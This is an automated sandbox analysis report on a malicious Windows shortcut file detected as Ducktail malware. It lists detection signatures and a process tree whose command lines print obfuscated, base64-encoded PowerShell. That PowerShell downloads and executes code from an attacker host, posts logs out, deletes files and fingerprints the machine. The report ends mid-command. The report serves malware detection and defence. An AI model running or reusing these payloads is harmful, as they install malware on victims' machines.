Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cOOhDuNWt7.lnk

Overview

General Information

Sample name:cOOhDuNWt7.lnk
Analysis ID:1551872
MD5:debef20706412ab3f25ef815b847ff02
SHA1:c18cf92b12dbf73ff372a950e62e33cc48987b89
SHA256:6321591fc9e0174f89778113066675f36358474eb7177c7de36db0ccd8f836da
Infos:

Detection

Ducktail
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Ducktail
Allows multiple concurrent remote connection
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Modifies security policies related information
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: PowerShell Base64 Encoded WMI Classes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Yara detected Obfuscated Powershell
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • cmd.exe (PID: 4484 cmdline: "C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1276 cmdline: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 2636 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 2488 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFF9A.tmp" "c:\Users\user\AppData\Local\Temp\wr03xjs0\CSC787E510638EC4229B85DAEC3AD1CFCC9.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • powershell.exe (PID: 680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • AcroRd32.exe (PID: 8428 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf" MD5: 0F4FB7ADA3C27236864D008A1687AD8D)
          • RdrCEF.exe (PID: 8704 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215 MD5: 35AF5C1FA6FAC9569BB3FF6654A7152E)
            • RdrCEF.exe (PID: 8876 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2352 --field-trial-handle=1644,i,17074868649269977898,11316506185755287373,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 35AF5C1FA6FAC9569BB3FF6654A7152E)
      • cmd.exe (PID: 6432 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 8236 cmdline: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • WmiPrvSE.exe (PID: 8204 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • svczHost.exe (PID: 9772 cmdline: C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com MD5: EB57894A8FF610DF55C97E427D0DDD7B)
    • conhost.exe (PID: 9780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9840 cmdline: "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 9908 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 10004 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • powershell.exe (PID: 9916 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 9932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 10080 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand 